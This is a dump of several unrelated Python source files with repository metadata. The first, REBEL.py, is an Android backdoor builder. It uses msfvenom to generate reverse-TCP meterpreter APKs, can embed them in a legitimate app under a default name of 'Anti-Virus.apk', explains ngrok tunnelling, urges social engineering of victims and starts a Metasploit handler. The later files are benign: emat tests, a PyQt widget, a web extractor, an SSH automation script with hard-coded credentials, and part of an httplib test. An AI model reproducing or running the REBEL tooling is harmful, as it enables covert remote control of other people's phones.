] | 1 | 2021-01-11T11:27:48.000Z | 2021-01-11T11:27:48.000Z | REBEL.py | root-user744/REBEL | f1e4fbc0f032bda38253f61e3a391a70815e8915 | [
"Apache-2.0"
] | null | null | null | REBEL.py | root-user744/REBEL | f1e4fbc0f032bda38253f61e3a391a70815e8915 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import time
import subprocess
poster = """
\033[32m══════════════════════════════════════════════\033[0m
\033[31m██████\033[32m╗\033[0m \033[31m███████\033[32m╗\033[0m\033[31m██████\033[32m╗\033[0m \033[31m███████\033[32m╗\033[0m\033[31m██\033[32m╗\033[0m
\033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔════╝\033[0m\033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔════╝\033[0m\033[31m██\033[32m║\033[0m
\033[31m██████\033[32m╔╝\033[0m\033[31m█████\033[32m╗\033[0m \033[31m██████\033[32m╔╝\033[0m\033[31m█████\033[32m╗\033[0m \033[31m██\033[32m║\033[0m
\033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔══╝\033[0m \033[31m██\033[32m╔══\033[0m\033[31m██\033[32m╗\033[0m\033[31m██\033[32m╔══╝\033[0m \033[31m██\033[32m║\033[0m
\033[31m██\033[32m║\033[0m \033[31m██\033[32m║\033[0m\033[31m███████\033[32m╗\033[0m\033[31m██████\033[32m╔╝\033[0m\033[31m███████\033[32m╗\033[0m\033[31m███████\033[32m╗\033[0m
\033[32m╚═╝\033[0m \033[32m╚═╝\033[0m\033[32m╚══════╝\033[0m\033[32m╚═════╝\033[0m \033[32m╚══════╝\033[0m\033[32m╚══════╝\033[0m
\033[32m═══════════════════════════════════════════════\033[0m
\033[04m\033[37mCreated with love by Nathan Elderson\033[0m
\033[04m\033[37mversion 0.1\033[0m
"""
print(poster)
def createPayload(ip, port, path):
    """Build an Android reverse-TCP meterpreter APK with msfvenom.

    :param ip: listener host (LHOST) baked into the payload
    :param port: listener port (LPORT); converted to str
    :param path: output file path for the generated APK
    """
    # SECURITY: ip/port/path come from user input. Pass an argument list with
    # shell=False so shell metacharacters in them cannot inject extra commands
    # (the previous shell=True string form was injectable).
    command = [
        "msfvenom",
        "-p", "android/meterpreter/reverse_tcp",
        "LHOST=" + ip,
        "LPORT=" + str(port),
        "-o", path,
    ]
    subprocess.call(command)
def createEmbededPayload(appPath, ip, port, path):
    """Embed a reverse-TCP meterpreter payload into an existing APK with msfvenom.

    :param appPath: path of the template APK to inject into (msfvenom -x)
    :param ip: listener host (LHOST) baked into the payload
    :param port: listener port (LPORT); converted to str
    :param path: output file path for the generated APK
    """
    # SECURITY: all four arguments are user-controlled. Use an argument list
    # with shell=False so they cannot inject shell commands (the previous
    # shell=True string form was injectable).
    command1 = [
        "msfvenom",
        "-x", appPath,
        "-p", "android/meterpreter/reverse_tcp",
        "LHOST=" + ip,
        "LPORT=" + str(port),
        "-o", path,
    ]
    subprocess.call(command1)
def checkIP(ip):
    """Return True if ``ip`` is a valid dotted-quad IPv4 address.

    Fixes the previous heuristic, which accepted out-of-range octets
    (e.g. "999.999.999.999"), trailing whitespace, and empty octets,
    because it only checked for letters, dot count and total length.
    All genuinely valid IPv4 addresses still return True.
    """
    parts = ip.split(".")
    if len(parts) != 4:
        return False
    for part in parts:
        # isdigit() rejects empty octets, signs, spaces and other junk.
        if not part.isdigit():
            return False
        if not 0 <= int(part) <= 255:
            return False
    return True
def animateWord(word):
    """Print ``word`` to stdout one character at a time (typewriter effect)."""
    for ch in word:
        # print with end=""/flush=True is equivalent to write()+flush().
        print(ch, end="", flush=True)
        time.sleep(0.030)
def autoExploit(ip, port):
meta = input("[\033[34m:?:\033[0m]\033[32mWant me to open the Metasploit Framework and exploit automatically for you(yes/N):\033[0m ").strip()
if meta == "yes" or meta == "Yes" or meta == "YES" or meta == "y" or meta == "Y":
os.system("clear")
with open("commands.txt", "w") as file:
file.write("use exploit/multi/handler\n")
file.write("set payload android/meterpreter/reverse_tcp\n")
file.write(f"set lhost {ip}\n")
file.write(f"set lport " + str(port) + "\n")
file.write("exploit")
elif meta == "no" or meta == "No" or meta == "NO" or meta == "n" or meta == "N":
print(" [\033[93m:)\033[0m]\033[32mOK Bye!!!\033[0m")
exit()
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option.\033[0m")
exit()
WAN = False
wanORlan = input("[\033[34m:?:\033[0m]\033[32mWant to make payload for LAN or WAN(l/WAN):\033[0m ").strip()
if wanORlan == "wan" or wanORlan == "Wan" or wanORlan == "WAN" or wanORlan == "w" or wanORlan == "W":
WAN = True
print("\n\033[36mOpen up a new terminal and start a ngrok tcp tunnel with command \033[01m\033[32mngrok tcp 1234\033[0m")
print("\033[36mGrab the IP and Port of the TCP tunnel and provide this IP and Port when prompted...\033[0m")
print("\033[36mAfter this job press Enter to continue...\033[0m")
input()
elif wanORlan == "lan" or wanORlan == "Lan" or wanORlan == "LAN" or wanORlan == "l" or wanORlan == "L":
WAN = False
print("[\033[34m:+:\033[0m]\033[32mProvide your local IP...\033[0m")
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option...\033[0m")
exit()
IP = input("[\033[34m:+:\033[0m]\033[32mEnter the IP Address:\033[0m ")
if IP == "":
print("[\033[31m:✗:\033[0m]\033[31mNo IP provided.\033[0m")
exit()
else:
IPcheckPass = checkIP(IP)
if IPcheckPass == True:
pass
else:
print("[\033[31m:✗:\033[0m]\033[31mSeems like you need to learn about some basic networking...\033[0m")
exit()
try:
Port = input("[\033[34m:+:\033[0m]\033[32mEnter the Port Number to bind to:\033[0m ")
if Port == "":
print("[\033[31m:✗:\033[0m]\033[31mNo Port Number was provided.\033[0m")
exit()
for ch in Port:
if ch.isalpha() == True:
raise Exception
except Exception:
print("[\033[31m:✗:\033[0m]\033[31mSeems like you need to learn about some basic networking...\033[0m")
exit()
embeded = False
embed = input("[\033[34m:?:\033[0m]\033[32mWant an embeded payload(y) or just the raw payload(NO){y/NO}:\033[0m ").strip()
if embed == "yes" or embed == "Yes" or embed == "YES" or embed == "y" or embed == "Y":
embeded = True
filePath = input("[\033[34m:+:\033[0m]\033[32mEnter the path to original .apk file(\033[04m\033[01mprovide/the/full_path\033[0m\033[32m):\033[0m ").rstrip("/")
check1 = os.path.exists(filePath)
if check1 == True:
if ".apk" not in filePath:
print(f"[\033[31m:✗:\033[0m]\033[31m{filePath} is a directory but i asked for a .apk file...\033[0m")
exit()
if check1 == False:
print("[\033[31m:✗:\033[0m]\033[31mPath does not exists.\033[0m")
exit()
payloadName = input("[\033[34m:+:\033[0m]\033[32mName the new embeded payload(\033[04m\033[01me.g. name.apk\033[0m\033[32m):\033[0m ")
if payloadName == "":
print("[\033[31m:✗:\033[0m]\033[31mNo name was provided.\033[0m")
print("""[\033[34m:+:\033[0m]\033[32mSelecting default name "Anti-Virus.apk"\033[0m """)
payloadName = "Anti-Virus.apk"
if ".apk" not in payloadName:
print("[\033[31m:✗:\033[0m]\033[31mmissing file extention '.apk'\033[0m")
exit()
else:
pass
newName = False
payloadPath = input("[\033[34m:+:\033[0m]\033[32mEnter the path to output the embeded payload\n(eg: \033[04m/please/provide/only_the/path/\033[0m\033[32m):\033[0m ").rstrip("/")
check2 = os.path.exists(payloadPath)
if payloadPath == "":
newName = True
out = os.getcwd()
payloadPath = out
elif check2 == False:
print("[\033[31m:✗:\033[0m]\033[31mPath does not exists.\033[0m")
exit()
elif ".apk" in payloadPath:
print("[\033[31m:✗:\033[0m]\033[31mIt was asked to provide only the path.\nStart the program again...\033[0m")
exit()
if newName == False:
sentence2 = (f'\n\033[32mGenerating embeded payload having name "{payloadName}" with love only for you...\033[0m\n')
else:
newName == True
print("[\033[31m:✗:\033[0m]\033[31mNo path was provided.\033[0m\n[\033[34m:+:\033[0m]\033[32mSelecting the present directory to output it.\033[0m")
sentence2 = (f'\n\033[32mGenerating embeded payload "{payloadName}" at {payloadPath}\033[0m\n')
animateWord(sentence2)
print()
createEmbededPayload(filePath, IP, Port, payloadPath + "/" + payloadName)
elif embed == "no" or embed == "No" or embed == "NO" or embed == "n" or embed == "N":
embeded = False
Path = input("[\033[34m:+:\033[0m]\033[32mEnter the full path to output the payload (\033[04m\033[01mor just 'name.apk'\033[0m\033[32m):\033[0m ").rstrip("/")
if ".apk" in Path:
pass
else:
check = os.path.exists(Path)
if check == True:
pass
else:
print("[\033[31m:✗:\033[0m]\033[31mPath does not exists.\033[0m")
exit()
namedPayload = False
if ".apk" in Path:
namedPayload = True
for char in Path:
if char == "/":
namedPayload = False
sentence3 = (f'\n\033[32mGenerating payload with love only for you...\033[0m\n')
animateWord(sentence3)
print()
createPayload(IP, Port, Path)
if namedPayload == True:
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {os.getcwd()}/{Path}\033[0m\n")
else:
namedPayload == False
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {Path}\033[0m\n")
else:
payloadYn = input("[\033[34m:+:\033[0m]\033[32mWant to rename the .apk file(yes/N):\033[0m ").strip()
if payloadYn == "yes" or payloadYn == "Yes" or payloadYn == "YES" or payloadYn == "y" or payloadYn == "Y":
name = input("[\033[34m:+:\033[0m]\033[32mEnter the name(\033[01m\033[04meg: name.apk\033[0m\033[32m):\033[0m ")
sentence4 = (f'\n\033[32mGenerating payload having name "{name}" with love only for you...\033[0m\n')
animateWord(sentence4)
print()
createPayload(IP, Port, Path + "/" + name)
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {Path}/{name}\033[0m\n")
elif payloadYn == "no" or payloadYn == "No" or payloadYn == "NO" or payloadYn == "n" or payloadYn == "N":
sentence5 = (f'\n\033[32mGenerating payload having name "payload.apk" with love only for you...\033[0m\n')
animateWord(sentence5)
print()
createPayload(IP, Port, Path + "/payload.apk")
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {Path}/payload.apk\033[0m\n")
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option.\033[0m")
exit()
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option.\033[0m")
exit()
print("\n\033[31mNOTE\033[0m: \033[04m\033[32mThis payload will be easily detected by the system's security.\033[0m")
print("\033[32mAnd it's upto you how you make the target install this payload on his/her Android OS.\033[0m")
print("\033[32mTIP from the author: Hack the most vulnerable OS the HumanOS to make it done.\033[0m\n")
print("\033[32mAfter this job press Enter to continue...\033[0m")
input()
if WAN == True:
ip = "0.0.0.0"
port = 1234
autoExploit(ip, port)
subprocess.call("msfconsole --resource commands.txt", shell=True)
elif WAN == False:
autoExploit(IP, Port)
subprocess.call("msfconsole --resource commands.txt", shell=True) | 43.327434 | 253 | 0.616932 |
9dfbb70b4c93cf57692ba576151a6d1a4e01010a | 5,054 | py | Python | tests/test_filesmodel.py | MarainInc/tmip-emat | 700514342cf263b484a4f42ac783100159dcddb2 | [
"BSD-3-Clause"
] | null | null | null | tests/test_filesmodel.py | MarainInc/tmip-emat | 700514342cf263b484a4f42ac783100159dcddb2 | [
"BSD-3-Clause"
] | null | null | null | tests/test_filesmodel.py | MarainInc/tmip-emat | 700514342cf263b484a4f42ac783100159dcddb2 | [
"BSD-3-Clause"
] | 1 | 2020-08-06T07:36:21.000Z | 2020-08-06T07:36:21.000Z |
import unittest
import os
from pytest import approx
import pandas as pd
import numpy as np
import emat
from emat.scope.scope import Scope
from emat.database.sqlite.sqlite_db import SQLiteDB
class TestCoreFilesMethods(unittest.TestCase):
    """Tests for the files-based core model helpers in ``emat.model.core_files``."""

    def test_getters(self):
        """Check repr() and evaluation of the loc/iloc DataFrame getter objects.

        The getters are small callables that pull a scalar out of a parsed
        output table: ``loc``/``iloc`` index a single cell, the ``*_mean`` and
        ``*_sum`` variants aggregate a slice, and getters compose with ``+``.
        """
        from emat.model.core_files.parsers import loc, loc_mean, loc_sum
        from emat.model.core_files.parsers import iloc, iloc_mean, iloc_sum

        # 5x10 frame of 0..49 so every expected value below is easy to verify
        # by hand (value at row r, col c == 10*r + c).
        zz = pd.DataFrame(
            np.arange(50).reshape(5, 10),
            index=[f'row{i}' for i in range(1, 6)],
            columns=[f'col{i}' for i in range(1, 11)],
        )
        # The repr of each getter should round-trip the indexing expression.
        a = loc['row2','col8']
        assert repr(a) == "loc['row2','col8']"
        h = iloc[3,3]
        assert repr(h) == 'iloc[3,3]'
        i = iloc_mean[:2,7:]
        assert repr(i) == 'iloc_mean[:2,7:]'
        k = iloc_sum[2,:]
        assert repr(k) == 'iloc_sum[2,:]'
        j = h + k
        assert repr(j) == 'iloc[3,3]+iloc_sum[2,:]'
        # Calling a getter with the frame evaluates it.
        assert a(zz) == 17
        assert h(zz) == 33
        assert i(zz) == approx(13)
        assert k(zz) == 245
        assert j(zz) == 278

    def test_load_archived_gbnrtc(self):
        """Load archived measures for experiment 1 of the bundled GBNRTC example
        and compare against a frozen snapshot of expected values."""
        import emat.examples
        s, db, m = emat.examples.gbnrtc()
        # Point the model at the archive directory shipped with the package.
        m.archive_path = emat.examples.package_file("examples", "gbnrtc", "archive")
        assert os.path.exists(m.get_experiment_archive_path(1))
        measures = m.load_archived_measures(1)
        # Frozen expected values for experiment 1; keep byte-identical to the
        # archived run so any parser regression is caught.
        correct_1 = {
            'Peak Walk-to-transit Boarding': 34281.205786,
            'Off-Peak Walk-to-transit Boarding': 32321.752577999996,
            'Peak Drive-to-transit Boarding': 4650.044377,
            'Off-Peak Drive-to-transit Boarding': 3896.5493810000003,
            'Total Transit Boardings': 75149.55212200001,
            'Peak Walk-to-transit LRT Boarding': 9008.224461,
            'Off-Peak Walk-to-transit LRT Boarding': 10645.432359,
            'Peak Drive-to-transit LRT Boarding': 2761.200268,
            'Off-Peak Drive-to-transit LRT Boarding': 2406.542344,
            'Total LRT Boardings': 24821.399432,
            'Region-wide VMT': 25113613.736528996,
            'Total Auto VMT': 22511322.163062,
            'Total Truck VMT': 2602291.573469,
            'Interstate + Expressway + Ramp/Connector VMT': 10305109.628398,
            'Major and Minor Arterials VMT': 10475969.845537,
            'AM Trip Time (minutes)': 14.654542999999999,
            'AM Trip Length (miles)': 7.548014,
            'PM Trip Time (minutes)': 15.324133999999999,
            'PM Trip Length (miles)': 8.261152000000001,
            'Peak Transit Share': 0.014477,
            'Peak NonMotorized Share': 0.060296,
            'Off-Peak Transit Share': 0.011423,
            'Off-Peak NonMotorized Share': 0.056386,
            'Daily Transit Share': 0.012819999999999998,
            'Daily NonMotorized Share': 0.058175, 'Households within 30 min of CBD': 399597,
            'Number of Home-based work tours taking <= 45 minutes via transit': 340958.875,
            'Downtown to Airport Travel Time': 14.443295999999998,
            'OD Volume District 1 to 1': 2,
            'OD Volume District 1 to 2': 27850.572266000003,
            'OD Volume District 1 to 3': 93799.382813,
            'OD Volume District 1 to 4': 23470.341797,
            'OD Volume District 1 to 5': 20363.416016,
            'OD Volume District 1 to 6': 2140.624268,
            'OD Volume District 1 to 7': 21603.265625,
            'OD Volume District 1 to 8': 1890.3181149999998,
            'OD Volume District 1 to 9': 10427.630859,
            'OD Volume District 1 to 10': 4448.775879,
            'Kensington Daily VMT': 206937.015614,
            'Kensington Daily VHT': 239242.35552800001,
            'Kensington_OB PM VMT': 26562.351204,
            'Kensington_OB PM VHT': 31363.340938,
            'Kensington_IB AM VMT': 23796.174231999998,
            'Kensington_IB AM VHT': 30434.206062999998,
            '190 Daily VMT': 282469.874037,
            '190 Daily VHT': 300633.50829,
            '190_OB Daily VMT': 36483.463967,
            '190_OB Daily VHT': 45783.789093,
            '190_IB Daily VMT': 30282.776539,
            '190_IB Daily VHT': 33375.415786000005,
            '33_west Daily VMT': 45402.79583,
            '33_west Daily VHT': 57478.416767999995,
            'I90_south Daily VMT': 147224.53766099998,
            'I90_south Daily VHT': 153543.832728,
        }
        # The archive may contain more measures than the snapshot; require the
        # snapshot keys to be present, then compare values approximately.
        assert set(correct_1.keys()).issubset(measures.keys())
        assert {k: measures[k] for k in correct_1.keys()} == approx(correct_1)
def test_files_with_broken_scope():
    """A scope that references a bogus measure should yield all-NaN results.

    Requires the optional ``core_files_demo`` package; the test is skipped
    when it is not installed.
    """
    try:
        import core_files_demo
    except ImportError:
        # Fix: the original bare `except:` also swallowed unrelated
        # import-time failures (syntax errors, missing sub-dependencies),
        # silently skipping the test instead of surfacing the real problem.
        import pytest
        pytest.skip("core_files_demo not installed")
    fx = core_files_demo.RoadTestFileModel(
        scope_file=emat.package_file('model', 'tests', 'road_test_corrupt2.yaml')
    )
    design = fx.design_experiments(n_samples=2)
    result = fx.run_experiments(design)
    # The corrupt scope's 'bogus_measure' cannot be parsed, so every run
    # should report it as missing (NaN).
    assert result['bogus_measure'].isna().all()
if __name__ == '__main__':
    # Allow running this test module directly (python test_filesmodel.py)
    # in addition to discovery via pytest.
    unittest.main()
| 39.484375 | 92 | 0.600317 |
13b4413031a0f88e3ab61376515afe8132c830d0 | 3,279 | py | Python | libraries/base/qtWidgets/shuffleBox.py | PiRSquared17/r-orange | 6bc383f1db3c10c59e16b39daffc44df904ce031 | [
"Apache-2.0"
] | 1 | 2019-04-15T13:50:30.000Z | 2019-04-15T13:50:30.000Z | libraries/base/qtWidgets/shuffleBox.py | PiRSquared17/r-orange | 6bc383f1db3c10c59e16b39daffc44df904ce031 | [
"Apache-2.0"
] | null | null | null | libraries/base/qtWidgets/shuffleBox.py | PiRSquared17/r-orange | 6bc383f1db3c10c59e16b39daffc44df904ce031 | [
"Apache-2.0"
] | 1 | 2016-01-21T23:00:21.000Z | 2016-01-21T23:00:21.000Z | """Shuffle Box
This is a Red-R specific widget. The shuffleBox inherits from the listBox with the added ability that the order of items can be changed using the drag/drop feature (so they are shuffled). This is useful for setting the order in which items appear.
"""
from redRGUI import widgetState
from libraries.base.qtWidgets.listBox import listBox
import redRReports,redRLog
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from OrderedDict import OrderedDict
import redRi18n
_ = redRi18n.get_(package = 'base')
class shuffleBox(listBox):
    """A listBox whose items can be reordered (shuffled) via drag and drop.

    Dropping a selection moves the dragged items from the source widget into
    this list at the drop position.  When the widget is bound to Red-R
    settings (``ogLabels``/``ogValue``), those backing attributes are updated
    instead of manipulating the Qt items directly.
    """

    def __init__(self, *args, **kwargs):
        # Drag/drop must be enabled for shuffling to work at all.
        listBox.__init__(self, enableDragDrop = True, *args, **kwargs)

    def dropEvent(self, ev):
        """Handle a drop: move the dragged items to the drop position.

        The mime text carries the source widget's selected item indices.
        """
        if not self.enableDragDrop: return
        if ev.mimeData().hasText():
            # Translate the drop position into a target row index; dropping
            # past the last item appends.
            item = self.itemAt(ev.pos())
            if item:
                index = self.indexFromItem(item).row()
            else:
                index = self.count()

            source = ev.mimeData().source
            # NOTE(review): eval() of the drag payload -- acceptable only
            # because the payload originates inside this application.
            selectedItemIndices = eval(unicode(ev.mimeData().text()))
            if self.ogLabels != None and self.ogValue != None:
                # Settings-backed path: rebuild the label list and selection
                # stored on the owning widget.
                allSourceItems = getdeepattr(source.widget, source.ogLabels, default = [])
                selectedItems = [allSourceItems[i] for i in selectedItemIndices]
                allDestItems = getdeepattr(self.widget, self.ogLabels, default = [])
                items = [item for item in allSourceItems if item not in selectedItems]
                if index < len(allDestItems):
                    while index > 0 and index in getdeepattr(self.widget, self.ogValue, default = []): # if we are dropping items on a selected item, we have to select some previous unselected item as the drop target
                        index -= 1
                    destItem = allDestItems[index]
                    index = items.index(destItem)
                else:
                    index = max(0, index - len(selectedItems))
                setattr(self.widget, self.ogLabels, items[:index] + selectedItems + items[index:])
                setattr(self.widget, self.ogValue, range(index, index+len(selectedItems)))
            else: # if we don't have variables ogValue and ogLabel
                # Direct Qt path: physically move the QListWidgetItems.
                if index < self.count():
                    while index > 0 and self.item(index).isSelected(): # if we are dropping items on a selected item, we have to select some previous unselected item as the drop target
                        index -= 1
                items = [source.item(i) for i in selectedItemIndices]
                # Remove from the source (highest index first so earlier
                # indices stay valid), adjusting the insertion point as items
                # before it disappear.
                for ind in selectedItemIndices[::-1]:
                    source.takeItem(ind)
                    if ind <= index: index-= 1
                for item in items[::-1]:
                    self.insertItem(index, item)
                self.clearSelection()
                for i in range(index, index+len(items)):
                    self.item(i).setSelected(1)
            if self.dragDopCallback: # call the callback
                self.dragDopCallback()
            ev.setDropAction(Qt.MoveAction)
            ev.accept()
            ## whatever all of this does we need to execute the function to update the items
            self.updateRedRItems()
        else:
            ev.ignore()
e8097d5ea97775f66b4fa15a066f0b427f076e7d | 300 | py | Python | src/colusa/plugins/etr_techtarget.py | huuhoa/symphony | f8a364649634b4d864771b2c8a3103b714b6b9e2 | [
"MIT"
] | 6 | 2020-08-29T04:14:15.000Z | 2020-09-18T10:53:59.000Z | src/colusa/plugins/etr_techtarget.py | huuhoa/colusa | 07a0a60680c8085c5dca522e0237f7b5a5181dcb | [
"MIT"
] | 34 | 2021-09-07T15:17:38.000Z | 2022-03-25T15:16:40.000Z | src/colusa/plugins/etr_techtarget.py | huuhoa/colusa | 07a0a60680c8085c5dca522e0237f7b5a5181dcb | [
"MIT"
] | 2 | 2020-08-29T04:21:35.000Z | 2020-09-13T17:36:06.000Z | from colusa.etr import Extractor, register_extractor
@register_extractor('.techtarget.com/')
class TechTargetExtractor(Extractor):
    """Extractor plugin for article pages hosted on techtarget.com."""

    def _find_main_content(self):
        # The article body lives inside <section id="content-body">.
        content_section = self.bs.find('section', id='content-body')
        return content_section

    def cleanup(self):
        # No site-specific cleanup is needed beyond the base behaviour.
        super(TechTargetExtractor, self).cleanup()
| 27.272727 | 57 | 0.733333 |
6ae3b1c132f7ff1220ac0d9c69c65cdfb99db7a8 | 5,150 | py | Python | Old/AutoShell0.2.py | frankie336/AutoShell | 3aef9fff7dfdcb10e8e8741585fd0331797358e8 | [
"MIT"
] | null | null | null | Old/AutoShell0.2.py | frankie336/AutoShell | 3aef9fff7dfdcb10e8e8741585fd0331797358e8 | [
"MIT"
] | null | null | null | Old/AutoShell0.2.py | frankie336/AutoShell | 3aef9fff7dfdcb10e8e8741585fd0331797358e8 | [
"MIT"
] | null | null | null | """
Created on Mon Jan 11 20:08:27 2021
#! Python 3.8
@author: Francis Neequaye
francis.neequaye@gmail.com
"""
"""
Script Instructions
_____
1.Enter the remote IP's addresses of
Cisco (or other) devices on each search
of the Hosts.dat file
2. Enter input commands on each line of
the Commands.dat file
"""
import paramiko
import time
from multiprocessing.pool import ThreadPool
import re
import datetime
import psutil
import logging
start = time.time()
class AutoShellInterface:
    """Abstract interface for the file-backed load/save operations AutoShell uses.

    Concrete workers (see ShellWork) override both methods; the base bodies
    are intentionally no-ops.
    """

    def LoadDataToList(self, path: str, file_name: str) -> str:
        """Read the file at ``path + file_name`` and return its lines as a list."""
        pass

    def SaveDataFromList(self, path: str, file_name: str) -> str:
        """Write previously collected lines to a file under ``path``."""
        pass
class ShellWork(AutoShellInterface):
    """Concrete AutoShell worker.

    Loads target hosts and shell commands from the SetUp directory, runs the
    commands over SSH on every host concurrently (one pool thread per host),
    and writes each device's captured output to a per-hostname file under
    Output\\.
    """

    count_cores = psutil.cpu_count(logical=True)#Count number of cores/threads in CPU

    def __init__(self):
        # NOTE(review): `username` and `password` are module-level globals
        # that are only bound inside the __main__ guard; instantiating
        # ShellWork from another module without defining them raises NameError.
        self.date_time = datetime.datetime.now().strftime("%Y-%m-%d")
        self.username = username
        self.password = password

    def LoadDataToList(self, path: str, file_name: str) -> list:
        """Overrides AutoShellInterface.LoadDataToList().

        Read ``path + file_name`` and return its lines as a list, with empty
        lines removed.
        """
        # Fix: the docstring previously claimed to override SaveDataFromList().
        with open(path+file_name) as f:
            lines = f.read().splitlines()
        lines = [string for string in lines if string != ""]#Remove possible empty lines
        return lines

    def SaveDataFromList(self, path: str, file_name: str,
                         list_name: str) -> None:
        """Overrides AutoShellInterface.SaveDataFromList().

        Write ``list_name`` (captured shell output) to
        ``path/<date>_<file_name>.txt``.
        """
        # Fix: the docstring previously claimed to override LoadDataToList().
        with open(path+str(self.date_time)+'_'+file_name+'.txt', "w") as f:
            f.writelines(list_name)

    def SetUpCommands(self):
        """Return the shell input commands listed in SetUp\\Commands.dat."""
        commands = self.LoadDataToList(path='SetUp\\',file_name='Commands.dat')
        return commands

    def TeminalZero(self):
        """Return the command that disables output paging on the device.

        Only Cisco-style ``terminal length 0`` is implemented for now.
        """
        device = 'Cisco'
        term_zero_list = ['terminal length 0\n']
        if device == 'Cisco':
            terminal_length = term_zero_list[0]
        return terminal_length

    def Connect(self, host_ip):
        """Open an SSH shell to ``host_ip``, send every command, and return
        the decoded terminal output.

        Returns None (after printing the error) when the host is unreachable
        or authentication fails, so the pool can continue with other hosts.
        """
        terminal_length = self.TeminalZero()
        commands = self.SetUpCommands()
        try:
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(host_ip, port=22, username=self.username, password=self.password, look_for_keys=False, timeout=None)
            channel = ssh.get_transport().open_session()
            channel.invoke_shell()
        except Exception as e:
            print(host_ip,e.args)
            return
        channel.sendall(terminal_length)#Send terminal length zero command
        time.sleep(.2)
        # Send each input command, pausing so the device can produce output.
        for x in commands:
            channel.sendall(x+"\n")
            time.sleep(1)
        # Fix: use a local variable instead of self.shell_output.  Connect()
        # runs on several pool threads at once, so writing the result into a
        # shared instance attribute was a data race; only the return value
        # was ever consumed.
        shell_output = channel.recv(9999).decode(encoding='utf-8') #Receive buffer output
        ssh.close()
        return shell_output# Return to threads

    def SaveToFile(self,files):
        """Derive each device's hostname from its CLI prompt and save output.

        For Cisco devices:
        1. Search for the hostname string.
        2. Strip the user-mode prompt character (``>`` or ``#``) from it.
        3. Save the output under that hostname.
        """
        mode_prompt_patterns = ['>','#']
        look_behind_prompt = ['(.+)'+mode_prompt_patterns[0],'(.+)'+mode_prompt_patterns[1]]
        hostname_pat = re.compile( '|'.join(look_behind_prompt))
        to_strip = re.compile( '|'.join(mode_prompt_patterns))
        for ele in files:
            if ele is None:
                # Fix: Connect() returns None for unreachable hosts; the old
                # code crashed here (AttributeError on a failed re.search).
                continue
            stripped = (re.search(to_strip, str(ele))).group(0)
            # NOTE(review): str.strip() removes *characters* from both ends,
            # not a suffix -- hostnames ending in the prompt char over-trim.
            hostname = (re.search(hostname_pat, str(ele))).group().strip(stripped)
            self.SaveDataFromList(path='Output\\',file_name=hostname,list_name=ele)
            print(hostname,'done',stripped)

    def MultThreadConn(self):
        """Fan Connect() out over a thread pool (one task per line of
        SetUp\\Hosts.dat), then save every captured output.
        """
        loop_hosts = self.LoadDataToList(path='SetUp\\',file_name='Hosts.dat')
        # Fix: read the class attribute via self instead of instantiating a
        # throwaway ShellWork() (which also required the __main__ globals).
        THREADS = ThreadPool(self.count_cores)#Set the number of threads
        SHELL_OUT = THREADS.map(self.Connect, loop_hosts)
        self.SaveToFile(SHELL_OUT)
        THREADS.close()
        THREADS.join()  # Fix: wait for worker threads to exit before returning.
if __name__ == "__main__":
    # SECURITY NOTE(review): credentials are hard-coded module globals that
    # ShellWork.__init__ reads; prefer prompting (getpass) or a config file.
    username = 'cisco'
    password = 'cisco'
    a = ShellWork()
    a.MultThreadConn()
    end = time.time()
    print(end - start)  # total wall-clock runtime of the batch run
| 22.587719 | 132 | 0.583107 |
38c0d2db0ede8d6f2b217ce9341f97115585b0db | 17,211 | py | Python | greentest/2.7pypy/test_httplib.py | Eugeny/gevent | adb7b838ed66c13abe5059605730bb4b4531bbcd | [
"MIT"
] | 70 | 2015-08-04T09:39:43.000Z | 2021-09-04T23:28:39.000Z | greentest/2.7pypy/test_httplib.py | Eugeny/gevent | adb7b838ed66c13abe5059605730bb4b4531bbcd | [
"MIT"
] | 8 | 2016-04-28T16:05:09.000Z | 2019-04-02T07:21:23.000Z | greentest/2.7pypy/test_httplib.py | Eugeny/gevent | adb7b838ed66c13abe5059605730bb4b4531bbcd | [
"MIT"
] | 299 | 2015-01-23T10:06:24.000Z | 2022-02-02T06:34:51.000Z | import httplib
import array
import httplib
import StringIO
import socket
import errno
import unittest
TestCase = unittest.TestCase
from test import test_support
HOST = test_support.HOST
class FakeSocket:
    """Minimal socket stand-in: records everything sent, replays canned text.

    `makefile` returns `fileclass(text)` so HTTPResponse can read the canned
    server reply; `data` accumulates whatever the client sent.
    """

    def __init__(self, text, fileclass=StringIO.StringIO):
        self.text = text
        self.fileclass = fileclass
        self.data = ''

    def sendall(self, data):
        # ''.join flattens both plain strings and iterables of strings.
        self.data = self.data + ''.join(data)

    def makefile(self, mode, bufsize=None):
        if mode not in ('r', 'rb'):
            raise httplib.UnimplementedFileMode()
        return self.fileclass(self.text)
class EPipeSocket(FakeSocket):
    """FakeSocket variant that simulates a broken pipe.

    sendall() raises EPIPE as soon as the configured trigger substring
    appears in the outgoing data.
    """

    def __init__(self, text, pipe_trigger):
        FakeSocket.__init__(self, text)
        self.pipe_trigger = pipe_trigger

    def sendall(self, data):
        if data.find(self.pipe_trigger) != -1:
            raise socket.error(errno.EPIPE, "gotcha")
        self.data += data

    def close(self):
        pass
class NoEOFStringIO(StringIO.StringIO):
    """Like StringIO, but raises AssertionError on EOF.

    This is used below to test that httplib doesn't try to read
    more from the underlying file than it should.
    """

    def read(self, n=-1):
        chunk = StringIO.StringIO.read(self, n)
        if chunk == '':
            raise AssertionError('caller tried to read past EOF')
        return chunk

    def readline(self, length=None):
        line = StringIO.StringIO.readline(self, length)
        if line == '':
            raise AssertionError('caller tried to read past EOF')
        return line
class HeaderTests(TestCase):
    """Tests for request-header generation in httplib."""

    def test_auto_headers(self):
        # Some headers are added automatically, but should not be added by
        # .request() if they are explicitly set.

        class HeaderCountingBuffer(list):
            # Output buffer that counts how many times each header name is
